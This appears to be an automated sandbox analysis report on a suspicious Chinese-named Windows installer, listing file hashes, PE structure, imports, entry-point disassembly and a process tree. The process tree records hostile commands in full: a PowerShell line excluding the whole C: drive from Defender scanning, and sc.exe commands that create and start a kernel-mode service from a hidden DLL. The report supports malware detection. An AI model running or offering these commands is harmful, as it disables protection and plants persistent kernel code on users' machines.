                                  Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..
                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.921220316367972
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 98.04%
                                  • Inno Setup installer (109748/4) 1.08%
                                  • InstallShield setup (43055/19) 0.42%
                                  • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                  File name:#U5b89#U88c5#U52a9#U624b_1.0.9.exe
                                  File size:5'707'684 bytes
                                  MD5:ff430c30f7b9f0550f6b68dcc709c55b
                                  SHA1:a47d3d79a05d232d45aadd14045765521cfd8431
                                  SHA256:6a11d0ca2303bffe42e568f32c1adefd70742379ce2639f2ee2a437051ac9c13
                                  SHA512:44cc03072673a2a2953899e75f0445d11cb3a005a4dd43091ab2fac27517ab2661562dca1a4b96c515d2a7c33d56b91fea5c98e2b7e5cbf3d1134ca69eb6da0b
                                  SSDEEP:98304:XwREoZqR+RuRmr4qNb1R088uArvgOv5EcNQ+DidMwZgf:lvRz1qNz/ts
                                  TLSH:3A461213F2CBE43EF0591B3715B2B15895FB6A606823AE1696ECB4ACCF350601D3E647
                                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                  Icon Hash:0c0c2d33ceec80aa
                                  Entrypoint:0x4a83bc
                                  Entrypoint Section:.itext
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:6
                                  OS Version Minor:1
                                  File Version Major:6
                                  File Version Minor:1
                                  Subsystem Version Major:6
                                  Subsystem Version Minor:1
                                  Import Hash:40ab50289f7ef5fae60801f88d4541fc
                                  Instruction
                                  push ebp
                                  mov ebp, esp
                                  add esp, FFFFFFA4h
                                  push ebx
                                  push esi
                                  push edi
                                  xor eax, eax
                                  mov dword ptr [ebp-3Ch], eax
                                  mov dword ptr [ebp-40h], eax
                                  mov dword ptr [ebp-5Ch], eax
                                  mov dword ptr [ebp-30h], eax
                                  mov dword ptr [ebp-38h], eax
                                  mov dword ptr [ebp-34h], eax
                                  mov dword ptr [ebp-2Ch], eax
                                  mov dword ptr [ebp-28h], eax
                                  mov dword ptr [ebp-14h], eax
                                  mov eax, 004A2EBCh
                                  call 00007F0090DA3EC5h
                                  xor eax, eax
                                  push ebp
                                  push 004A8AC1h
                                  push dword ptr fs:[eax]
                                  mov dword ptr fs:[eax], esp
                                  xor edx, edx
                                  push ebp
                                  push 004A8A7Bh
                                  push dword ptr fs:[edx]
                                  mov dword ptr fs:[edx], esp
                                  mov eax, dword ptr [004B0634h]
                                  call 00007F0090E3584Bh
                                  call 00007F0090E3539Eh
                                  lea edx, dword ptr [ebp-14h]
                                  xor eax, eax
                                  call 00007F0090E30078h
                                  mov edx, dword ptr [ebp-14h]
                                  mov eax, 004B41F4h
                                  call 00007F0090D9DF73h
                                  push 00000002h
                                  push 00000000h
                                  push 00000001h
                                  mov ecx, dword ptr [004B41F4h]
                                  mov dl, 01h
                                  mov eax, dword ptr [0049CD14h]
                                  call 00007F0090E313A3h
                                  mov dword ptr [004B41F8h], eax
                                  xor edx, edx
                                  push ebp
                                  push 004A8A27h
                                  push dword ptr fs:[edx]
                                  mov dword ptr fs:[edx], esp
                                  call 00007F0090E358D3h
                                  mov dword ptr [004B4200h], eax
                                  mov eax, dword ptr [004B4200h]
                                  cmp dword ptr [eax+0Ch], 01h
                                  jne 00007F0090E3C5BAh
                                  mov eax, dword ptr [004B4200h]
                                  mov edx, 00000028h
                                  call 00007F0090E31C98h
                                  mov edx, dword ptr [004B4200h]
                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0xb70000x71.edata
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xb50000xfec.idata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xcb0000x11000.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000x10fa8.reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0xb90000x18.rdata
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0xb52d40x25c.idata
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xb60000x1a4.didata
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x10000xa568c0xa5800b889d302f6fc48a904de33d8d947ae80False0.3620185045317221data6.377190161826806IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .itext0xa70000x1b640x1c00588dd0a8ab499300d3701cbd11b017d9False0.548828125data6.109264411030635IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .data0xa90000x38380x3a005c0c76e77aef52ebc6702430837ccb6eFalse0.35338092672413796data4.95916338709992IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .bss0xad0000x72580x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .idata0xb50000xfec0x1000627340dff539ef99048969aa4824fb2dFalse0.380615234375data5.020404933181373IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .didata0xb60000x1a40x200fd11c1109737963cc6cb7258063abfd6False0.34765625data2.729290535217263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .edata0xb70000x710x2007de8ca0c7a61668a728fd3a88dc0942dFalse0.1796875data1.305578535725827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .tls0xb80000x180x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rdata0xb90000x5d0x200d84006640084dc9f74a07c2ff9c7d656False0.189453125data1.3892750148744617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .reloc0xba0000x10fa80x11000a85fda2741bd9417695daa5fc5a9d7a5False0.5789579503676471data6.709466460182023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                  .rsrc0xcb0000x110000x11000a38d03cb2f026a0f99883dd9fce161dbFalse0.18785903033088236data3.7213085960795746IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                  RT_ICON0xcb6780xa68Device independent bitmap graphic, 64 x 128 x 4, image size 2048EnglishUnited States0.1174924924924925
                                  RT_ICON0xcc0e00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.15792682926829268
                                  RT_ICON0xcc7480x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.23387096774193547
                                  RT_ICON0xcca300x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.39864864864864863
                                  RT_ICON0xccb580x1628Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colorsEnglishUnited States0.08339210155148095
                                  RT_ICON0xce1800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.1023454157782516
                                  RT_ICON0xcf0280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.10649819494584838
                                  RT_ICON0xcf8d00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.10838150289017341
                                  RT_ICON0xcfe380x12e5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8712011577424024
                                  RT_ICON0xd11200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.05668398677373642
                                  RT_ICON0xd53480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.08475103734439834
                                  RT_ICON0xd78f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.09920262664165103
                                  RT_ICON0xd89980x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.2047872340425532
                                  RT_STRING0xd8e000x3f8data0.3198818897637795
                                  RT_STRING0xd91f80x2dcdata0.36475409836065575
                                  RT_STRING0xd94d40x430data0.40578358208955223
                                  RT_STRING0xd99040x44cdata0.38636363636363635
                                  RT_STRING0xd9d500x2d4data0.39226519337016574
                                  RT_STRING0xda0240xb8data0.6467391304347826
                                  RT_STRING0xda0dc0x9cdata0.6410256410256411
                                  RT_STRING0xda1780x374data0.4230769230769231
                                  RT_STRING0xda4ec0x398data0.3358695652173913
                                  RT_STRING0xda8840x368data0.3795871559633027
                                  RT_STRING0xdabec0x2a4data0.4275147928994083
                                  RT_RCDATA0xdae900x10data1.5
                                  RT_RCDATA0xdaea00x310data0.6173469387755102
                                  RT_RCDATA0xdb1b00x2cdata1.1590909090909092
                                  RT_GROUP_ICON0xdb1dc0xbcdataEnglishUnited States0.6170212765957447
                                  RT_VERSION0xdb2980x584dataEnglishUnited States0.2804532577903683
                                  RT_MANIFEST0xdb81c0x7a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3377551020408163
                                  DLLImport
                                  kernel32.dllGetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                                  comctl32.dllInitCommonControls
                                  user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                                  oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                                  advapi32.dllConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
                                  NameOrdinalAddress
                                  __dbk_fcall_wrapper20x40fc10
                                  dbkFCallWrapperAddr10x4b063c
                                  Language of compilation systemCountry where language is spokenMap
                                  EnglishUnited States
                                  No network behavior found

                                  Click to jump to process

                                  Click to jump to process

                                  Click to dive into process behavior distribution

                                  Click to jump to process

                                  Target ID:0
                                  Start time:23:17:25
                                  Start date:22/12/2024
                                  Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe"
                                  Imagebase:0x6b0000
                                  File size:5'707'684 bytes
                                  MD5 hash:FF430C30F7B9F0550F6B68DCC709C55B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:Borland Delphi
                                  Reputation:low
                                  Has exited:true

                                  Target ID:1
                                  Start time:23:17:25
                                  Start date:22/12/2024
                                  Path:C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp" /SL5="$20456,4753292,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe"
                                  Imagebase:0xd40000
                                  File size:3'366'912 bytes
                                  MD5 hash:9902FA6D39184B87AED7D94A037912D8
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:Borland Delphi
                                  Reputation:low
                                  Has exited:true

                                  Target ID:2
                                  Start time:23:17:26
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:3
                                  Start time:23:17:26
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:4
                                  Start time:23:17:29
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                  Imagebase:0x7ff693ab0000
                                  File size:496'640 bytes
                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                  Has elevated privileges:true
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  Target ID:5
                                  Start time:23:17:34
                                  Start date:22/12/2024
                                  Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" /VERYSILENT
                                  Imagebase:0x6b0000
                                  File size:5'707'684 bytes
                                  MD5 hash:FF430C30F7B9F0550F6B68DCC709C55B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:Borland Delphi
                                  Reputation:low
                                  Has exited:false

                                  Target ID:6
                                  Start time:23:17:35
                                  Start date:22/12/2024
                                  Path:C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp" /SL5="$40272,4753292,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" /VERYSILENT
                                  Imagebase:0xb0000
                                  File size:3'366'912 bytes
                                  MD5 hash:9902FA6D39184B87AED7D94A037912D8
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:Borland Delphi
                                  Reputation:low
                                  Has exited:true

                                  Target ID:7
                                  Start time:23:17:37
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:8
                                  Start time:23:17:37
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:9
                                  Start time:23:17:37
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:10
                                  Start time:23:17:37
                                  Start date:22/12/2024
                                  Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                  Wow64 process (32bit):true
                                  Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                                  Imagebase:0x9f0000
                                  File size:831'200 bytes
                                  MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Antivirus matches:
                                  • Detection: 0%, ReversingLabs
                                  Has exited:true

                                  Target ID:11
                                  Start time:23:17:37
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:12
                                  Start time:23:17:38
                                  Start date:22/12/2024
                                  Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                  Wow64 process (32bit):true
                                  Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                                  Imagebase:0x9f0000
                                  File size:831'200 bytes
                                  MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:13
                                  Start time:23:17:38
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:14
                                  Start time:23:17:38
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:15
                                  Start time:23:17:38
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:16
                                  Start time:23:17:38
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:17
                                  Start time:23:17:38
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:18
                                  Start time:23:17:38
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:19
                                  Start time:23:17:38
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:20
                                  Start time:23:17:39
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:21
                                  Start time:23:17:39
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:23
                                  Start time:23:17:39
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:24
                                  Start time:23:17:39
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:25
                                  Start time:23:17:39
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:26
                                  Start time:23:17:39
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:27
                                  Start time:23:17:39
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:28
                                  Start time:23:17:39
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:29
                                  Start time:23:17:39
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:30
                                  Start time:23:17:39
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:31
                                  Start time:23:17:39
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:32
                                  Start time:23:17:39
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:33
